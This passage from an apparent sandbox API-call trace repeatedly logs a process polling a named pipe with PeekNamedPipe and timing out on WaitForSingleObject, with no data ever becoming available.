lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.905] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.937] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.937] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.966] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.967] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.997] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.998] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.028] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.029] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.060] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.060] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.091] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.091] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.122] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.122] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.153] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.153] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.184] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.185] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.216] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.216] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.247] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.247] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.278] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.278] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.309] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.309] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.340] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.340] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.372] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.372] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.404] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.404] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.434] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.435] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.465] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.465] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.497] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.497] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.528] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.528] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.560] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.560] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.606] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.606] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.637] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.637] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.669] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.669] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.699] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.699] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.730] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.731] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.762] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.762] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.793] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.793] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.824] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.824] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.858] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.858] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.886] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.886] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.918] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.918] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.949] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.949] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0076.980] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.980] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.014] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.014] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.042] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.042] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.074] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.074] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.105] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.105] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.136] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.136] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.167] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.167] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.198] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.198] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.230] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.230] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.261] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.261] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.292] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.292] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.323] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.323] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.354] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.354] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.386] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.386] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.417] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.417] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.448] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.448] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.479] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.479] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.512] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.512] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.542] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.542] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.573] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.573] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.617] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.617] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.635] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.635] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.666] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.667] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.698] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.698] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.730] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.730] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0077.760] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.760] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.202] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.202] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.228] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.228] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.259] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.259] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.290] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.291] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.322] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.322] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.353] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.353] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.385] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.385] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.415] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.416] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.459] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.460] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.478] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, 